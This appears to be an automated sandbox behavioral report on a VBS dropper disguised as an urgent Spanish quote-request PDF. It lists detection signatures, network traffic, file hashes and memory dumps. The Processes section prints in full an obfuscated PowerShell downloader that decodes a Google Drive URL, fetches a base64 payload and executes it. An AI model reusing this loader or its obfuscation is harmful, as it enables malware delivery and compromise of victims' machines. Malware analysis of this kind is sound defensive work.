memory/3056-376-0x0000000000400000-0x0000000000581000-memory.dmp
memory/3056-377-0x0000000000400000-0x0000000000581000-memory.dmp
memory/3056-378-0x0000000000400000-0x0000000000581000-memory.dmp
memory/3056-379-0x0000000000400000-0x0000000000581000-memory.dmp
memory/3056-380-0x0000000000400000-0x0000000000581000-memory.dmp
memory/3056-382-0x0000000000400000-0x0000000000581000-memory.dmp
memory/3056-381-0x0000000000400000-0x0000000000581000-memory.dmp
memory/3056-383-0x0000000000400000-0x0000000000581000-memory.dmp
memory/3056-384-0x0000000000400000-0x0000000000581000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-25 16:26
Reported
2024-03-25 16:28
Platform
win10v2004-20240226-en
Max time kernel
140s
Max time network
144s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Solicitud de presupuesto Urgente 554PE·pdf.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Superreflection Arrigere Benzamide #>;$Tephrite=(cmd /c set /A 115^^0);Function Underlivssygdom ([String]$Perkussion){$Tephrite=[char][int]$Tephrite;$Brndselsforbrug=$Tephrite+'ubstring';$Blodtud=8;$Befalinger=Politbureauer($Perkussion);For($Sentimentaliteternes=7; $Sentimentaliteternes -lt $Befalinger; $Sentimentaliteternes+=$Blodtud){$Greasewood=$Perkussion.$Brndselsforbrug.Invoke($Sentimentaliteternes, 1);$Homomorfiers=$Homomorfiers+$Greasewood;}$Homomorfiers;}function Bhmere ($Opkaldsforsgenes130){. ($Skelsaarene) ($Opkaldsforsgenes130);}function Politbureauer ([String]$Pussly47){$Efteruddannelseskurserne184=$Pussly47.Length-1;$Efteruddannelseskurserne184;}$Normalise=Underlivssygdom 'FinansmT RollehrmodkravaTruffesntimothysUndeniafgynaec,e BeredsrFloridirBearnaiiUnfuellnTill dsgKrystal ';$Rejfede=Underlivssygdom 'praksishHelstkntHaveejetBedri.gp .tofmnsInsigni:Obstetr/S ringm/Ho nhindS,peracrWampishiTilsig vFamil,aeAsper i.Moosewogbackupfo liequo surkaagUdpnseulNonsetteInsubo,.Epikurec olorcaoFremmedmDobbelt/ Omslynu ComputcTilsma,?Maelkave Faconnx R allnp MfindtoKaar,derImmunoet Und.rd=FlectacdDuggedeoBacteriwProtegenNongloblChokblgoJudgersaRelatiodDamasce&r possei Barnepd,amburu=T,eater1 AnstreiDipp,duGCradlemDUddriveSUnderhaBNlderruVLithotok,lluviavRebslagcFla deotUnhypnoVFinansugPentapoSFootpacJ fterneRSkraa iyPrinter1Substa.R SklmssMUnambitE mon,anoS ytsugJ Rest,aOReform TabbotnunUniversldelprob9Famili,jAnticatBLinjersZKr,byloSGirdledmKulture ';$Skelsaarene=Underlivssygdom 'Ska.leri.aundereNaturpaxProtect ';$Unfanatical=Underlivssygdom 'No amen$ ampshegDuennadlAfskalnoLuciferbAktivisa TinksmlLoesteg:ReintegNDefros.ymalignam Re.rgafTa kangoRgrunnem JordndaKbstadbnKaleturi ChromosJobnavn Man,fic=Ma,tnon Eftert,S T.gnestGravureaElektrirEvilsaytGlycoll-TrykordB esculeiSnnekontHeptagysHardf rTIntegrar.lodernaGooglyanledelinsCanzonifFinittee Tumphyr Accomp Drags.e-PlanereS ,tarbaoKana,bouOver,eerSupe.obc.ogonsleS,ejfen Frazz e$,elandiRSprgeske Nu merj SatanifAntimaneAnang od Cro laeRhyp ro Greenla-Konsu.tDAcervateMasset sBellmaktBracerhiMerstignUdsmyknaUnpre it AreniciEpikur oStudentnG.eaveg unref e$overoffsHeale,scRansageaTher atnGr.vimetMisdeemlhjtrag iDeputatn .almstg illepo ';Bhmere (Underlivssygdom ' Semitr$R adighgRidd,rvlRabiditoBrandtobKarnosjaNonevinlC lubri: MisplasTraveskc SuperaaA ansihnGen emat BatraclbyggemyiPrevotinTutor.ygTortsve=vitamin$ OvernoeImpolitnRosalinvPannier:Ne.likea Re,venpGennemfpAlarm rd SurdejaMantisst Kyangoaguiding ') ;Bhmere (Underlivssygdom ' TepefyITrustmomovermilp xposuroIdrtsharUtak.emtArbejds-RocklesMBrancheoSk,bsfad Opdri,uMasselalMetasomeEightpe UndersB.erispoiExt nsit Flyv,bsVisersbTAfskrivrInbreeda RygskanSporulas Schismf TrilleeGrudgekrFor,uft ') ;$scantling=$scantling+'\Svanish.Udv' ;Bhmere (Underlivssygdom ' P.rson$S,squiogC,rvicolAblutioo ForvalbEksam.naSagita,lSlovaki:KronoloP onlubre Ko mennViriliztMandya aAntiguapKontroloplas,ifl,hemotaikyssenesLegalit=Int rmi( nequalT Ne,dfueBort.ljsForher,tDatasik-Malef cPMyectopaScr.wpotSulfatahVejrkor Poorisb$ AntonssSkippedcunnaturaSvi ebrnKlippebtunconsplResentmiDufte.enChinookg Boligm)Tiltr.a ') ;while (-not $Pentapolis) {Bhmere (Underlivssygdom 'DeprecaISubmorpfJesuate Brug,so( Homero$InstrukNUnchamfy FeriegmSekslbef SteppeoSmandskm TankefaVejrenenPentomiiMetodiks Stepne. B gageJMin.stro Maalesb SulfanS assebotMonoso aSkylightFuldvrdeNonconn ,ftrapp- OpkbteeDelesteqDistra. Brsern$GuaconiNAnpartsoChokr prNedarvnmAut,dafaAfg.vell,amrerdi Raskols OrglereDampssk) Signif .dveksl{GennemgS ForldrtfasanerarevolutrMetalsltcampho -Interl,S Hstgill bulkene arkfdeeVolke,wp Up,win Sammen1H rtigs}.orgonzeForsik.lBrudefrs ArresteRula.le{,ormogoSR harrotProfeteaCorbinarSwagg,rt ygroth-To.ristSMisinstlCoagulae Kramnie Nontrapri,erne Ne.atoc1Laryngo;LftelseBViklingh GenindmLobolooe TappedrJerikoreupbinds Saddel.$ ledormUSarrusonForsorgf Helbreasalsdren SmelteaChemisetu ugtsfiBanderncHexoctaaKomitmglOmkreds} Vindma ');Bhmere (Underlivssygdom 'Episcop$SaneredgUnblestlModarbeoAccept,bO.ergana besejllUnseawo:Fer,oelPGennemtecivilisnHappenetInabusia,rofferp kkkeneofilamenlUnfro kiResizess Shonki=.tatska(RepentsTBalledreMennesksRecarrytSchoold- PassioPUnlituraSjungedtModstykhJok.ste D ninge$JavitersTils,recConviciaSkibsben Brug rtAnmeldelAldrichiRe,argunHypovalgHoldnum)f,rbrug ') ;}Bhmere (Underlivssygdom 'Hje,fal$ReglemegJugu.arlElokvenoSoranskbhusnummaPangm.rl,ildige:Mu.ticoC DuraunePhonemir Empaesa Over.utGappieroRep rtedMale,isiSslaglodOutba,kaWendisheAsylmot Limpetl=Inaniti SkotteGPu,vieweV.nkorttPolygal-A tivitCRetrofooQuiverenAlurgittLigedaneRobingknhearabltunionis Kammera$ PastursFormatlcKo,torda UnstoinPotteritSem.cyllFlyversiNr.edspn Informg Raunpi ');Bhmere (Underlivssygdom 'C echos$Enam.llgTranssklZucch to MelomabFlyvegra Prsid lKuglefl:Sluse.rVShtokavaSydd,nsn Ve eftdNi,eaulbTudesquaAnk mmedEtchimieChuckawtviriliosOvermal Ifints=Wlatso. Foruddi[ Her,taSkostskoyste hors uccestRepelleeTo vognm Virkso.SuppletCBrickexoFloddelnFlaskebvVejledeeSurnamer UnbrigtKonditi]Vi,osis:Apophys:Or,hardFSug.pumr Emigr,oprerelamTank.ngB etstrma IndvirsDomsakteDokumet6Helgens4 ladbrdSLuxembotLevellerFe.tnavi P pkornSkyllemgU,fitte(Godkend$Be,aevnCdarrelteRootagerPaleontaDancesst Solituo.eorchedSpleetni.ossepldNamarekaInterpeeInconc )Assecur ');Bhmere (Underlivssygdom ' pjatte$ UndvrlgSk altalK,rkegaotestsysb St tevaDisental Tilbeh: SelvovTKonditooBugt.lshudslusna.soximeaStatsopnOrtopd.dAvisarts Hjrnets,eastlivTelefonrDin,hyddD,migraeKvatoritIntersesYodelle Konnota=Folkeb. Ba itao[Du,gtesSStedepuyAspektesSwiplestRallysfeLnregulmAbrimrd. UrocenTSe ianaeIr,nmakxOmslag t ,rynte.BorderlE ChemotnComminacIodizero ChannedPortrttiAntiv vn ThreepgCent rf]Svbelse: Colubr:KeekingAFoto opS StedmoC PniterIKandidaIVigands. observGRationeeComprizt FlyproS ,ightat B,andlrV rdensiPo,ychrnIwanse.g hurchm(Perienc$AntipewVBefo.knaHostelrnT rpitsd Agete,b bios.eaUnoxid d ObdureeHoolieutSu.ersasZoo icp)Pho,oio ');Bhmere (Underlivssygdom 'lapning$bdeforlgpresupplPropolioNgendanbBairnlya DagsorlReaktio:Synlig,U arkerinVotariemTrykninoToughenvYdervgsaPhiloneb For.kalciliciae Sne lonBrandeieCoi.sjasud.igspsCorol.i=Sp ogly$ FagblaT Dieselo EksporhDdebogsa SrgebiaLuteinin RetoucdVaffelssSysselms Pas.opv aer.bar Infighd Skibspeo.ersoctAnvendesCredibl.S udievsTi vognuMarilinbGennemssUrostiftTr.dverrMisk.ediYellowsnnon.sycg Me,cer(dem.nic3Indefin1ledemot2 Waried8A tiamu7Consist9Unde we, etorto3Coul.ge2Sub erg1 Tetrag5Offerer5handrai)Frstere ');Bhmere $Unmovableness;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Superreflection Arrigere Benzamide #>;$Tephrite=(cmd /c set /A 115^^0);Function Underlivssygdom ([String]$Perkussion){$Tephrite=[char][int]$Tephrite;$Brndselsforbrug=$Tephrite+'ubstring';$Blodtud=8;$Befalinger=Politbureauer($Perkussion);For($Sentimentaliteternes=7; $Sentimentaliteternes -lt $Befalinger; $Sentimentaliteternes+=$Blodtud){$Greasewood=$Perkussion.$Brndselsforbrug.Invoke($Sentimentaliteternes, 1);$Homomorfiers=$Homomorfiers+$Greasewood;}$Homomorfiers;}function Bhmere ($Opkaldsforsgenes130){. ($Skelsaarene) ($Opkaldsforsgenes130);}function Politbureauer ([String]$Pussly47){$Efteruddannelseskurserne184=$Pussly47.Length-1;$Efteruddannelseskurserne184;}$Normalise=Underlivssygdom 'FinansmT RollehrmodkravaTruffesntimothysUndeniafgynaec,e BeredsrFloridirBearnaiiUnfuellnTill dsgKrystal ';$Rejfede=Underlivssygdom 'praksishHelstkntHaveejetBedri.gp .tofmnsInsigni:Obstetr/S ringm/Ho nhindS,peracrWampishiTilsig vFamil,aeAsper i.Moosewogbackupfo liequo surkaagUdpnseulNonsetteInsubo,.Epikurec olorcaoFremmedmDobbelt/ Omslynu ComputcTilsma,?Maelkave Faconnx R allnp MfindtoKaar,derImmunoet Und.rd=FlectacdDuggedeoBacteriwProtegenNongloblChokblgoJudgersaRelatiodDamasce&r possei Barnepd,amburu=T,eater1 AnstreiDipp,duGCradlemDUddriveSUnderhaBNlderruVLithotok,lluviavRebslagcFla deotUnhypnoVFinansugPentapoSFootpacJ fterneRSkraa iyPrinter1Substa.R SklmssMUnambitE mon,anoS ytsugJ Rest,aOReform TabbotnunUniversldelprob9Famili,jAnticatBLinjersZKr,byloSGirdledmKulture ';$Skelsaarene=Underlivssygdom 'Ska.leri.aundereNaturpaxProtect ';$Unfanatical=Underlivssygdom 'No amen$ ampshegDuennadlAfskalnoLuciferbAktivisa TinksmlLoesteg:ReintegNDefros.ymalignam Re.rgafTa kangoRgrunnem JordndaKbstadbnKaleturi ChromosJobnavn Man,fic=Ma,tnon Eftert,S T.gnestGravureaElektrirEvilsaytGlycoll-TrykordB esculeiSnnekontHeptagysHardf rTIntegrar.lodernaGooglyanledelinsCanzonifFinittee Tumphyr Accomp Drags.e-PlanereS ,tarbaoKana,bouOver,eerSupe.obc.ogonsleS,ejfen Frazz e$,elandiRSprgeske Nu merj SatanifAntimaneAnang od Cro laeRhyp ro Greenla-Konsu.tDAcervateMasset sBellmaktBracerhiMerstignUdsmyknaUnpre it AreniciEpikur oStudentnG.eaveg unref e$overoffsHeale,scRansageaTher atnGr.vimetMisdeemlhjtrag iDeputatn .almstg illepo ';Bhmere (Underlivssygdom ' Semitr$R adighgRidd,rvlRabiditoBrandtobKarnosjaNonevinlC lubri: MisplasTraveskc SuperaaA ansihnGen emat BatraclbyggemyiPrevotinTutor.ygTortsve=vitamin$ OvernoeImpolitnRosalinvPannier:Ne.likea Re,venpGennemfpAlarm rd SurdejaMantisst Kyangoaguiding ') ;Bhmere (Underlivssygdom ' TepefyITrustmomovermilp xposuroIdrtsharUtak.emtArbejds-RocklesMBrancheoSk,bsfad Opdri,uMasselalMetasomeEightpe UndersB.erispoiExt nsit Flyv,bsVisersbTAfskrivrInbreeda RygskanSporulas Schismf TrilleeGrudgekrFor,uft ') ;$scantling=$scantling+'\Svanish.Udv' ;Bhmere (Underlivssygdom ' P.rson$S,squiogC,rvicolAblutioo ForvalbEksam.naSagita,lSlovaki:KronoloP onlubre Ko mennViriliztMandya aAntiguapKontroloplas,ifl,hemotaikyssenesLegalit=Int rmi( nequalT Ne,dfueBort.ljsForher,tDatasik-Malef cPMyectopaScr.wpotSulfatahVejrkor Poorisb$ AntonssSkippedcunnaturaSvi ebrnKlippebtunconsplResentmiDufte.enChinookg Boligm)Tiltr.a ') ;while (-not $Pentapolis) {Bhmere (Underlivssygdom 'DeprecaISubmorpfJesuate Brug,so( Homero$InstrukNUnchamfy FeriegmSekslbef SteppeoSmandskm TankefaVejrenenPentomiiMetodiks Stepne. B gageJMin.stro Maalesb SulfanS assebotMonoso aSkylightFuldvrdeNonconn ,ftrapp- OpkbteeDelesteqDistra. Brsern$GuaconiNAnpartsoChokr prNedarvnmAut,dafaAfg.vell,amrerdi Raskols OrglereDampssk) Signif .dveksl{GennemgS ForldrtfasanerarevolutrMetalsltcampho -Interl,S Hstgill bulkene arkfdeeVolke,wp Up,win Sammen1H rtigs}.orgonzeForsik.lBrudefrs ArresteRula.le{,ormogoSR harrotProfeteaCorbinarSwagg,rt ygroth-To.ristSMisinstlCoagulae Kramnie Nontrapri,erne Ne.atoc1Laryngo;LftelseBViklingh GenindmLobolooe TappedrJerikoreupbinds Saddel.$ ledormUSarrusonForsorgf Helbreasalsdren SmelteaChemisetu ugtsfiBanderncHexoctaaKomitmglOmkreds} Vindma ');Bhmere (Underlivssygdom 'Episcop$SaneredgUnblestlModarbeoAccept,bO.ergana besejllUnseawo:Fer,oelPGennemtecivilisnHappenetInabusia,rofferp kkkeneofilamenlUnfro kiResizess Shonki=.tatska(RepentsTBalledreMennesksRecarrytSchoold- PassioPUnlituraSjungedtModstykhJok.ste D ninge$JavitersTils,recConviciaSkibsben Brug rtAnmeldelAldrichiRe,argunHypovalgHoldnum)f,rbrug ') ;}Bhmere (Underlivssygdom 'Hje,fal$ReglemegJugu.arlElokvenoSoranskbhusnummaPangm.rl,ildige:Mu.ticoC DuraunePhonemir Empaesa Over.utGappieroRep rtedMale,isiSslaglodOutba,kaWendisheAsylmot Limpetl=Inaniti SkotteGPu,vieweV.nkorttPolygal-A tivitCRetrofooQuiverenAlurgittLigedaneRobingknhearabltunionis Kammera$ PastursFormatlcKo,torda UnstoinPotteritSem.cyllFlyversiNr.edspn Informg Raunpi ');Bhmere (Underlivssygdom 'C echos$Enam.llgTranssklZucch to MelomabFlyvegra Prsid lKuglefl:Sluse.rVShtokavaSydd,nsn Ve eftdNi,eaulbTudesquaAnk mmedEtchimieChuckawtviriliosOvermal Ifints=Wlatso. Foruddi[ Her,taSkostskoyste hors uccestRepelleeTo vognm Virkso.SuppletCBrickexoFloddelnFlaskebvVejledeeSurnamer UnbrigtKonditi]Vi,osis:Apophys:Or,hardFSug.pumr Emigr,oprerelamTank.ngB etstrma IndvirsDomsakteDokumet6Helgens4 ladbrdSLuxembotLevellerFe.tnavi P pkornSkyllemgU,fitte(Godkend$Be,aevnCdarrelteRootagerPaleontaDancesst Solituo.eorchedSpleetni.ossepldNamarekaInterpeeInconc )Assecur ');Bhmere (Underlivssygdom ' pjatte$ UndvrlgSk altalK,rkegaotestsysb St tevaDisental Tilbeh: SelvovTKonditooBugt.lshudslusna.soximeaStatsopnOrtopd.dAvisarts Hjrnets,eastlivTelefonrDin,hyddD,migraeKvatoritIntersesYodelle Konnota=Folkeb. Ba itao[Du,gtesSStedepuyAspektesSwiplestRallysfeLnregulmAbrimrd. UrocenTSe ianaeIr,nmakxOmslag t ,rynte.BorderlE ChemotnComminacIodizero ChannedPortrttiAntiv vn ThreepgCent rf]Svbelse: Colubr:KeekingAFoto opS StedmoC PniterIKandidaIVigands. observGRationeeComprizt FlyproS ,ightat B,andlrV rdensiPo,ychrnIwanse.g hurchm(Perienc$AntipewVBefo.knaHostelrnT rpitsd Agete,b bios.eaUnoxid d ObdureeHoolieutSu.ersasZoo icp)Pho,oio ');Bhmere (Underlivssygdom 'lapning$bdeforlgpresupplPropolioNgendanbBairnlya DagsorlReaktio:Synlig,U arkerinVotariemTrykninoToughenvYdervgsaPhiloneb For.kalciliciae Sne lonBrandeieCoi.sjasud.igspsCorol.i=Sp ogly$ FagblaT Dieselo EksporhDdebogsa SrgebiaLuteinin RetoucdVaffelssSysselms Pas.opv aer.bar Infighd Skibspeo.ersoctAnvendesCredibl.S udievsTi vognuMarilinbGennemssUrostiftTr.dverrMisk.ediYellowsnnon.sycg Me,cer(dem.nic3Indefin1ledemot2 Waried8A tiamu7Consist9Unde we, etorto3Coul.ge2Sub erg1 Tetrag5Offerer5handrai)Frstere ');Bhmere $Unmovableness;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 3140 -ip 3140
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3140 -s 2520
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 202.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 20.231.121.79:80 | tcp | |
| GB | 172.217.169.78:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 78.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\postfertilizations.txt
| MD5 | 4c4cc23f3a17e931d1972c751c095e49 |
| SHA1 | 5e1298fed9d1e92444447d4257ef0e5fcd66031d |
| SHA256 | b068b30fb603c1a1bb4efbae00c421a6b5014f15b5757dfaff0348d8236be129 |
| SHA512 | 8a77950e5c116e1f925eac15458990a8aebc5abd3330d9d3e81d5e0a4faf1811dde4e21d8c4cddff0aa086f595d1a867d4965392089a56699354f2535c635181 |
C:\Users\Admin\AppData\Local\Temp\postfertilizations.txt
| MD5 | cf56f5795de669e0ee0796627c7142f2 |
| SHA1 | 89a71383fe582e3ec82a024fd424cef08943daf9 |
| SHA256 | 858e8b3e4c8bd64f2d11683cc1becf863238c7804c6712cfab844589591510bf |
| SHA512 | c331627fe54d5849ae37d29ce028d2a600d2a6a33351384abff6a594fc2ba109e3d09b45a5a15c1e656e33811fbf0ffb0c02983f9f45f50e2f149b0749707a30 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wuuj24qa.3nd.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3148-254-0x000001F73C7C0000-0x000001F73C7E2000-memory.dmp
memory/3148-258-0x00007FFD697F0000-0x00007FFD6A2B1000-memory.dmp
memory/3148-259-0x000001F754E20000-0x000001F754E30000-memory.dmp
memory/3148-260-0x000001F754E20000-0x000001F754E30000-memory.dmp
memory/3148-261-0x000001F754DC0000-0x000001F754DE6000-memory.dmp
memory/3148-262-0x000001F757320000-0x000001F757334000-memory.dmp
memory/3148-263-0x000001F754E20000-0x000001F754E30000-memory.dmp
memory/3148-264-0x000001F754E20000-0x000001F754E30000-memory.dmp
memory/3140-265-0x0000000004F40000-0x0000000004F76000-memory.dmp
memory/3140-266-0x0000000075060000-0x0000000075810000-memory.dmp
memory/3140-267-0x0000000002B80000-0x0000000002B90000-memory.dmp
memory/3140-268-0x0000000002B80000-0x0000000002B90000-memory.dmp
memory/3140-269-0x00000000055B0000-0x0000000005BD8000-memory.dmp
memory/3140-270-0x0000000005520000-0x0000000005542000-memory.dmp
memory/3140-272-0x0000000005DC0000-0x0000000005E26000-memory.dmp
memory/3140-271-0x0000000005D50000-0x0000000005DB6000-memory.dmp
memory/3140-282-0x0000000005EF0000-0x0000000006244000-memory.dmp
memory/3140-283-0x00000000064F0000-0x000000000650E000-memory.dmp
memory/3140-284-0x0000000006530000-0x000000000657C000-memory.dmp
memory/3140-285-0x0000000007D40000-0x00000000083BA000-memory.dmp
memory/3140-286-0x0000000006AF0000-0x0000000006B0A000-memory.dmp
memory/3140-287-0x0000000007770000-0x0000000007806000-memory.dmp
memory/3140-288-0x0000000007720000-0x0000000007742000-memory.dmp
memory/3140-289-0x0000000008970000-0x0000000008F14000-memory.dmp
memory/3140-290-0x0000000007990000-0x00000000079B2000-memory.dmp
memory/3140-291-0x00000000079F0000-0x0000000007A04000-memory.dmp
memory/3140-292-0x0000000075060000-0x0000000075810000-memory.dmp
memory/3148-295-0x00007FFD697F0000-0x00007FFD6A2B1000-memory.dmp